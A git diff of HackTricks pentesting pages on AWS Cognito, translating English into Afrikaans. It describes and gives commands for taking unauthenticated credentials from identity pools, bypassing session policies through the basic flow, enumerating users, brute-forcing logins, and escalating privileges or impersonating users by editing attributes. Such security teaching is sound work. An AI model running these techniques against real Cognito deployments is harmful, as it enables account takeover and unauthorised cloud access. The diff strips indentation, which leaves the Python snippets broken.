-Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles).
+### Gebruiker Pools - Ongeauthentiseerde Enumerasie
 
-### User Pools - Unauthenticated Enumeration
-
-Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.**
+Selfs as jy **nie 'n geldige gebruikersnaam** binne Cognito weet nie, mag jy in staat wees om **te enumereer** geldige **gebruikersname**, **BF** die **wagwoorde** of selfs **'n nuwe gebruiker te registreer** net **om die App kliënt ID** te weet (wat gewoonlik in die bronkode gevind word). [**Kyk hoe hier**](cognito-user-pools.md#registration)**.**
 
 ## Privesc
 
@@ -87,20 +85,16 @@ Even if you **don't know a valid username** inside Cognito, you might be able to
 ../../aws-privilege-escalation/aws-cognito-privesc.md
 {{#endref}}
 
-## Unauthenticated Access
+## Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
 {{#endref}}
 
-## Persistence
+## Volharding
 
 {{#ref}}
 ../../aws-persistence/aws-cognito-persistence.md
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
index 024c7ea91..8a07299fe 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
@@ -4,14 +4,13 @@
 
 ## Basic Information
 
-Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include:
-
-- Amazon Cognito user pools
-- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple
-- Providers compliant with OpenID Connect (OIDC)
-- SAML (Security Assertion Markup Language) identity providers
-- Developer authenticated identities
+Identiteitspoele speel 'n belangrike rol deur jou gebruikers in staat te stel om **tydelike geloofsbriewe** te **verkry**. Hierdie geloofsbriewe is noodsaaklik vir toegang tot verskeie AWS-dienste, insluitend maar nie beperk tot Amazon S3 en DynamoDB nie. 'n Opmerkelijke kenmerk van identiteitspoele is hul ondersteuning vir beide anonieme gasgebruikers en 'n verskeidenheid identiteitsverskaffers vir gebruikersverifikasie. Die ondersteunde identiteitsverskaffers sluit in:
 
+- Amazon Cognito gebruikerspoele
+- Sosiale aanmeldopsies soos Facebook, Google, Aanmeld met Amazon, en Meld aan met Apple
+- Verskaffers wat voldoen aan OpenID Connect (OIDC)
+- SAML (Security Assertion Markup Language) identiteitsverskaffers
+- Ontwikkelaar geverifieerde identiteite
 ```python
 # Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
 import boto3
@@ -24,74 +23,64 @@ identity_pool_id = 'your-identity-pool-id'
 
 # Add an identity provider to the identity pool
 response = client.set_identity_pool_roles(
-    IdentityPoolId=identity_pool_id,
-    Roles={
-        'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
-        'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
-    }
+IdentityPoolId=identity_pool_id,
+Roles={
+'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
+'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
+}
 )
 
 # Print the response from AWS
 print(response)
 ```
-
 ### Cognito Sync
 
-To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs.
+Om Identiteit Pool sessies te genereer, moet jy eers **'n Identiteit ID genereer**. Hierdie Identiteit ID is die **identifikasie van die sessie van daardie gebruiker**. Hierdie identifikasies kan tot 20 datasets hê wat tot 1MB van sleutel-waarde pare kan stoor.
 
-This is **useful to keep information of a user** (who will be always using the same Identity ID).
+Dit is **nuttig om inligting van 'n gebruiker te hou** (wat altyd dieselfde Identiteit ID sal gebruik).
 
-Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...).
+Boonop is die diens **cognito-sync** die diens wat toelaat om **hierdie inligting te bestuur en te sinkroniseer** (in die datasets, inligting in strome en SNS boodskappe te stuur...).
 
 ### Tools for pentesting
 
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), die AWS eksploitering raamwerk, sluit nou die "cognito\_\_enum" en "cognito\_\_attack" modules in wat die enumerasie van alle Cognito bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattributen wat vir toegangbeheer gebruik word, ens., merk, en outomatiseer ook gebruikersskepping (insluitend MFA-ondersteuning) en privilige-eskalasie gebaseer op aanpasbare pasattributen, bruikbare identiteits pool akkrediteer, aanneembare rolle in id tokens, ens.
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blog pos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy.
 
 #### Usage
 
-Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
-
+Voorbeeld van cognito\_\_attack gebruik om te probeer om 'n gebruiker te skep en alle privesc vektore teen 'n gegewe identiteits pool en gebruikerspool kliënt:
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
-
+Voorbeeld cognito\_\_enum gebruik om al die gebruikerspoele, gebruikerspoel kliënte, identiteitspoele, gebruikers, ens. wat sigbaar is in die huidige AWS-rekening, te versamel:
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is 'n CLI-gereedskap in python wat verskillende aanvalle op Cognito implementeer, insluitend ongewenste rekening skep en identiteitspoel eskalasie.
 
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation.
-
-#### Installation
-
+#### Installasie
 ```bash
 $ pip install cognito-scanner
 ```
-
-#### Usage
-
+#### Gebruik
 ```bash
 $ cognito-scanner --help
 ```
-
 For more information check https://github.com/padok-team/cognito-scanner
 
-## Accessing IAM Roles
+## Toegang tot IAM Rolle
 
-### Unauthenticated
+### Ongeoutentiseerde
 
-The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable).
+Die enigste ding wat 'n aanvaller moet weet om **AWS kredensiale** in 'n Cognito-toepassing as 'n ongeoutentiseerde gebruiker te **kry**, is die **Identiteit Pool ID**, en hierdie **ID moet hardgecodeer** wees in die web/mobiele **toepassing** sodat dit dit kan gebruik. 'n ID lyk soos volg: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (dit is nie bruteforceerbaar nie).
 
 > [!TIP]
-> The **IAM Cognito unathenticated role created via is called** by default `Cognito_<Identity Pool name>Unauth_Role`
-
-If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with:
+> Die **IAM Cognito ongeoutentiseerde rol wat via geskep is, word** standaard `Cognito_<Identiteit Pool naam>Unauth_Role` genoem.
 
+As jy 'n Identiteit Pools ID hardgecodeer vind en dit ongeoutentiseerde gebruikers toelaat, kan jy AWS kredensiale kry met:
 ```python
 import requests
 
@@ -105,8 +94,8 @@ r = requests.post(url, json=params, headers=headers)
 json_resp = r.json()
 
 if not "IdentityId" in json_resp:
-    print(f"Not valid id: {id_pool_id}")
-    exit
+print(f"Not valid id: {id_pool_id}")
+exit
 
 IdentityId = r.json()["IdentityId"]
 
@@ -117,23 +106,19 @@ r = requests.post(url, json=params, headers=headers)
 
 print(r.json())
 ```
-
-Or you could use the following **aws cli commands**:
-
+Of jy kan die volgende **aws cli commands** gebruik:
 ```bash
 aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
 aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign
 ```
-
 > [!WARNING]
-> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section.
+> Let daarop dat 'n nie-geverifieerde cognito **gebruiker GEEN toestemming kan hê nie, selfs al is dit via 'n beleid toegeken**. Kontroleer die volgende afdeling.
 
-### Enhanced vs Basic Authentication flow
+### Verbeterde vs Basiese Verifikasievloei
 
-The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/#session-policies) to the IAM role session generated. This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services).
-
-However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**.
+Die vorige afdeling het die **standaard verbeterde verifikasievloei** gevolg. Hierdie vloei stel 'n **beperkende** [**sessiebeleid**](../../aws-basic-information/#session-policies) in vir die IAM rol sessie wat gegenereer is. Hierdie beleid sal slegs toelaat dat die sessie [**die dienste van hierdie lys gebruik**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (selfs al het die rol toegang tot ander dienste).
 
+Daar is egter 'n manier om dit te omseil; as die **Identiteitspoel "Basiese (Klassieke) Vloei" geaktiveer het**, sal die gebruiker in staat wees om 'n sessie te verkry met behulp van daardie vloei wat **nie daardie beperkende sessiebeleid sal hê nie**.
 ```bash
 # Get auth ID
 aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
@@ -145,51 +130,46 @@ aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign
 ## If you don't know the role_arn use the previous enhanced flow to get it
 aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign
 ```
-
 > [!WARNING]
-> If you receive this **error**, it's because the **basic flow is not enabled (default)**
+> As jy hierdie **fout** ontvang, is dit omdat die **basiese vloei nie geaktiveer is nie (standaard)**
 
 > `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.`
 
-Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/).
+As jy 'n stel IAM-akkrediteerings het, moet jy [kontroleer watter toegang jy het](../../#whoami) en probeer om [privileges te verhoog](../../aws-privilege-escalation/).
 
-### Authenticated
+### Geverifieer
 
 > [!NOTE]
-> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials.
+> Onthou dat **geverifieerde gebruikers** waarskynlik **verskillende toestemmings** toegeken sal word, so as jy kan **aanmeld binne die app**, probeer dit en kry die nuwe akkrediteerings.
 
-There could also be **roles** available for **authenticated users accessing the Identity Poo**l.
+Daar kan ook **rolle** beskikbaar wees vir **geverifieerde gebruikers wat toegang tot die Identiteitspoel** het.
 
-For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**.
+Hiervoor mag jy toegang tot die **identiteitsverskaffer** nodig hê. As dit 'n **Cognito-gebruikerspoel** is, kan jy dalk die standaardgedrag misbruik en **self 'n nuwe gebruiker skep**.
 
 > [!TIP]
-> The **IAM Cognito athenticated role created via is called** by default `Cognito_<Identity Pool name>Auth_Role`
+> Die **IAM Cognito geverifieerde rol wat via geskep is, word standaard** `Cognito_<Identiteitspoel naam>Auth_Role` genoem.
 
-Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured).
+In elk geval, die **volgende voorbeeld** verwag dat jy reeds binne 'n **Cognito-gebruikerspoel** aangemeld het wat gebruik word om toegang tot die Identiteitspoel te verkry (moet nie vergeet dat ander tipes identiteitsverskaffers ook gekonfigureer kan word nie).
 
 <pre class="language-bash"><code class="lang-bash">aws cognito-identity get-id \
-    --identity-pool-id &#x3C;identity_pool_id> \
-    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+--identity-pool-id &#x3C;identity_pool_id> \
+--logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
 
-# Get the identity_id from the previous commnad response
+# Kry die identity_id van die vorige opdrag se antwoord
 aws cognito-identity get-credentials-for-identity \
-    --identity-id &#x3C;identity_id> \
-    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
+--identity-id &#x3C;identity_id> \
+--logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
 
 
-# In the IdToken you can find roles a user has access because of User Pool Groups
-# User the --custom-role-arn to get credentials to a specific role
+# In die IdToken kan jy rolle vind waartoe 'n gebruiker toegang het as gevolg van Gebruikerspoel Groepe
+# Gebruik die --custom-role-arn om akkrediteerings vir 'n spesifieke rol te kry
 aws cognito-identity get-credentials-for-identity \
-    --identity-id &#x3C;identity_id> \
+--identity-id &#x3C;identity_id> \
 <strong>    --custom-role-arn &#x3C;role_arn> \
 </strong>    --logins cognito-idp.&#x3C;region>.amazonaws.com/&#x3C;YOUR_USER_POOL_ID>=&#x3C;ID_TOKEN>
 </code></pre>
 
 > [!WARNING]
-> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**.
+> Dit is moontlik om **verskillende IAM rolle te konfigureer afhangende van die identiteitsverskaffer** waar die gebruiker aangemeld is of selfs net afhangende **van die gebruiker** (met behulp van aansprake). Daarom, as jy toegang tot verskillende gebruikers het deur dieselfde of verskillende verskaffers, kan dit **die moeite werd wees om aan te meld en toegang te verkry tot die IAM rolle van al hulle**.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
index 08e06fb45..7acffa54b 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
@@ -2,32 +2,31 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
+'n Gebruikerspoel is 'n gebruikersgids in Amazon Cognito. Met 'n gebruikerspoel kan jou gebruikers **aanmeld by jou web- of mobiele toepassing** deur Amazon Cognito, **of federate** deur 'n **derdeparty** identiteitsverskaffer (IdP). Of jou gebruikers nou direk of deur 'n derdeparty aanmeld, alle lede van die gebruikerspoel het 'n gidsprofiel wat jy deur 'n SDK kan toegang.
 
-User pools provide:
+Gebruikerspoele bied:
 
-- Sign-up and sign-in services.
-- A built-in, customizable web UI to sign in users.
-- Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool.
-- User directory management and user profiles.
-- Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
-- Customized workflows and user migration through AWS Lambda triggers.
+- Registrasie- en aanmelddienste.
+- 'n Ingeboude, aanpasbare web UI om gebruikers aan te meld.
+- Sosiale aanmelding met Facebook, Google, Login with Amazon, en Sign in with Apple, en deur SAML en OIDC identiteitsverskaffers van jou gebruikerspoel.
+- Gebruikersgidsbestuur en gebruikersprofiele.
+- Sekuriteitskenmerke soos multi-faktor verifikasie (MFA), kontrole vir gecompromitteerde geloofsbriewe, rekening oorname beskerming, en telefoon- en e-posverifikasie.
+- Aangepaste werksvloeie en gebruikersmigrasie deur AWS Lambda triggers.
 
-**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool.
+**Bronkode** van toepassings sal gewoonlik ook die **gebruikerspoel ID** en die **klienttoepassing ID** bevat, (en soms die **toepassing geheim**?) wat nodig is vir 'n **gebruiker om aan te meld** by 'n Cognito Gebruikerspoel.
 
-### Potential attacks
+### Potensiële aanvalle
 
-- **Registration**: By default a user can register himself, so he could create a user for himself.
-- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack.
-- **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**.
+- **Registrasie**: Standaard kan 'n gebruiker homself registreer, so hy kan 'n gebruiker vir homself skep.
+- **Gebruikersenumerasie**: Die registrasiefunksionaliteit kan gebruik word om gebruikersname te vind wat reeds bestaan. Hierdie inligting kan nuttig wees vir die brute-force aanval.
+- **Aanmeld brute-force**: In die [**Verifikasie**](cognito-user-pools.md#authentication) afdeling het jy al die **metodes** wat 'n gebruiker het om te **aanmeld**, jy kan probeer om hulle te brute-force **geldige geloofsbriewe te vind**.
 
-### Tools for pentesting
-
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\
-  For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+### Gereedskap vir pentesting
 
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), sluit nou die `cognito__enum` en `cognito__attack` modules in wat die enumerasie van alle Cognito bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattribuut wat vir toegangbeheer gebruik word, ens., merk, en outomatiseer ook gebruikersskepping (insluitend MFA-ondersteuning) en voorregverhoging gebaseer op aanpasbare aangepaste attribuut, bruikbare identiteitspoel geloofsbriewe, aanneembare rolle in id tokens, ens.\
+Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blogpos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie-instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy.
 ```bash
 # Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account
 Pacu (new:test) > run cognito__enum
@@ -37,201 +36,169 @@ Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gma
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info.
-
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is 'n CLI-gereedskap in python wat verskillende aanvalle op Cognito implementeer, insluitend ongewenste rekening skep en rekening oracle. Kyk na [hierdie skakel](https://github.com/padok-team/cognito-scanner) vir meer inligting.
 ```bash
 # Install
 pip install cognito-scanner
 # Run
 cognito-scanner --help
 ```
-
-- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users.
-
+- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): Hierdie skrip maak dit moontlik om geldige eienskappe vir gebruikers te enumereer.
 ```bash
 python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl
 ```
+## Registrasie
 
-## Registration
-
-User Pools allows by **default** to **register new users**.
-
+User Pools laat **per standaard** toe om **nuwe gebruikers te registreer**.
 ```bash
 aws cognito-idp sign-up --client-id <client-id> \
-    --username <username> --password <password> \
-    --region <region> --no-sign-request
+--username <username> --password <password> \
+--region <region> --no-sign-request
 ```
+#### As iemand kan registreer
 
-#### If anyone can register
-
-You might find an error indicating you that you need to **provide more details** of abut the user:
-
+Jy mag 'n fout vind wat aandui dat jy **meer besonderhede** oor die gebruiker moet verskaf:
 ```
 An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required
 ```
-
-You can provide the needed details with a JSON such as:
-
+U kan die nodige besonderhede met 'n JSON soos:
 ```json
 --user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]'
 ```
-
-You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name:
-
+U kan hierdie funksionaliteit ook gebruik om **bestaande gebruikers te enumereer.** Dit is die foutboodskap wanneer 'n gebruiker reeds met daardie naam bestaan:
 ```
 An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists
 ```
-
 > [!NOTE]
-> Note in the previous command how the **custom attributes start with "custom:"**.\
-> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**.
-
-Or just to test if a client id exists. This is the error if the client-id doesn't exist:
+> Let op in die vorige opdrag hoe die **aangepaste eienskappe begin met "custom:"**.\
+> Weet ook dat wanneer jy registreer jy **nie nuwe aangepaste eienskappe vir die gebruiker kan skep nie**. Jy kan net waarde gee aan **standaard eienskappe** (selfs al is hulle nie vereis nie) en **aangepaste eienskappe wat gespesifiseer is**.
 
+Of net om te toets of 'n kliënt-id bestaan. Dit is die fout as die kliënt-id nie bestaan nie:
 ```
 An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist.
 ```
+#### As slegs admin gebruikers kan registreer
 
-#### If only admin can register users
-
-You will find this error and you own't be able to register or enumerate users:
-
+Jy sal hierdie fout vind en jy sal nie in staat wees om gebruikers te registreer of te enumereer nie:
 ```
 An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool
 ```
-
 ### Verifying Registration
 
-Cognito allows to **verify a new user by verifying his email or phone number**. Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this:
-
+Cognito laat toe om **'n nuwe gebruiker te verifieer deur sy e-pos of telefoonnommer te verifieer**. Daarom, wanneer jy 'n gebruiker skep, sal jy gewoonlik ten minste die gebruikersnaam en wagwoord en die **e-pos en/of telefoonnommer** benodig. Stel net een **wat jy beheer** sodat jy die kode sal ontvang om **jou** nuut geskepte gebruiker **rekening** te verifieer soos volg:
 ```bash
 aws cognito-idp confirm-sign-up --client-id <cliet_id> \
-    --username aasdasd2 --confirmation-code <conf_code> \
-    --no-sign-request --region us-east-1
+--username aasdasd2 --confirmation-code <conf_code> \
+--no-sign-request --region us-east-1
 ```
-
 > [!WARNING]
-> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**.
+> Selfs al **lyk dit of jy dieselfde e-pos** en telefoonnommer kan gebruik, wanneer jy die geskepte gebruiker moet verifieer, sal Cognito kla oor die gebruik van dieselfde inligting en **sal nie toelaat dat jy die rekening verifieer** nie.
 
 ### Privilege Escalation / Updating Attributes
 
-By default a user can **modify the value of his attributes** with something like:
-
+Standaard kan 'n gebruiker **die waarde van sy eienskappe verander** met iets soos:
 ```bash
 aws cognito-idp update-user-attributes \
-    --region us-east-1 --no-sign-request \
-    --user-attributes Name=address,Value=street \
-    --access-token <access token>
+--region us-east-1 --no-sign-request \
+--user-attributes Name=address,Value=street \
+--access-token <access token>
 ```
-
-#### Custom attribute privesc
+#### Aangepaste attribuut privesc
 
 > [!CAUTION]
-> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself!
+> Jy mag **aangepaste attribuute** vind wat gebruik word (soos `isAdmin`), aangesien jy standaard **die waardes van jou eie attribuute kan verander** kan jy dalk **privileges eskaleer** deur die waarde self te verander!
 
-#### Email/username modification privesc
+#### E-pos/gebruikersnaam wysiging privesc
 
-You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again).
+Jy kan dit gebruik om **die e-pos en telefoonnommer** van 'n gebruiker te **wysig**, maar dan, selfs al bly die rekening as geverifieer, is daardie attribuute **in 'n ongeverifieerde status** (jy moet hulle weer verifieer).
 
 > [!WARNING]
-> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\
-> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**.
+> Jy **sal nie in staat wees om in te log met e-pos of telefoonnommer** totdat jy hulle verifieer nie, maar jy sal **in staat wees om in te log met die gebruikersnaam**.\
+> Let daarop dat selfs al is die e-pos gewysig en nie geverifieer nie, dit sal verskyn in die ID Token binne die **`email`** **veld** en die veld **`email_verified`** sal **vals** wees, maar as die app **nie nagaan nie, kan jy ander gebruikers naboots**.
 
-> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**.
-
-Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**:
+> Boonop, let daarop dat jy enigiets in die **`name`** veld kan plaas deur net die **naam attribuut** te wysig. As 'n app **nagaan** **daardie** veld om een of ander rede **in plaas van die `email`** (of enige ander attribuut) kan jy dalk **ander gebruikers naboots**.
 
+In elk geval, as jy om een of ander rede jou e-pos verander het, byvoorbeeld na 'n nuwe een wat jy kan toegang, kan jy **die e-pos bevestig met die kode wat jy in daardie e-posadres ontvang het**:
 ```bash
 aws cognito-idp verify-user-attribute \
-    --access-token <access_token> \
-    --attribute-name email --code <code> \
-    --region <region> --no-sign-request
+--access-token <access_token> \
+--attribute-name email --code <code> \
+--region <region> --no-sign-request
 ```
-
-Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**.
+Gebruik **`phone_number`** in plaas van **`email`** om 'n **nuwe telefoonnommer** te verander/te verifieer.
 
 > [!NOTE]
-> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user.
+> Die admin kan ook die opsie aktiver om **in te log met 'n gebruiker se verkose gebruikersnaam**. Let daarop dat jy nie hierdie waarde kan verander na **enige gebruikersnaam of verkose_gebruikersnaam wat reeds gebruik word** om 'n ander gebruiker na te doen nie.
 
-### Recover/Change Password
-
-It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there:
+### Herstel/Verander Wagwoord
 
+Dit is moontlik om 'n wagwoord te herstel net deur **die gebruikersnaam** te ken (of e-pos of telefoon word aanvaar) en toegang daartoe te hê, aangesien 'n kode daar gestuur sal word:
 ```bash
 aws cognito-idp forgot-password \
-    --client-id <client_id> \
-    --username <username/email/phone> --region <region>
+--client-id <client_id> \
+--username <username/email/phone> --region <region>
 ```
-
 > [!NOTE]
-> The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users
-
-With the code you can change the password with:
+> Die antwoord van die bediener gaan altyd positief wees, soos as die gebruikersnaam bestaan. Jy kan nie hierdie metode gebruik om gebruikers te enumereer nie.
 
+Met die kode kan jy die wagwoord verander met:
 ```bash
 aws cognito-idp confirm-forgot-password \
-    --client-id <client_id> \
-    --username <username> \
-    --confirmation-code <conf_code> \
-    --password <pwd> --region <region>
+--client-id <client_id> \
+--username <username> \
+--confirmation-code <conf_code> \
+--password <pwd> --region <region>
 ```
-
-To change the password you need to **know the previous password**:
-
+Om die wagwoord te verander, moet jy **die vorige wagwoord weet**:
 ```bash
 aws cognito-idp change-password \
-    --previous-password <value> \
-    --proposed-password <value> \
-    --access-token <value>
+--previous-password <value> \
+--proposed-password <value> \
+--access-token <value>
 ```
+## Authentisering
 
-## Authentication
+'n Gebruikerspoel ondersteun **verskillende maniere om te autentiseer**. As jy 'n **gebruikersnaam en wagwoord** het, is daar ook **verskillende metodes** wat ondersteun word om aan te meld.\
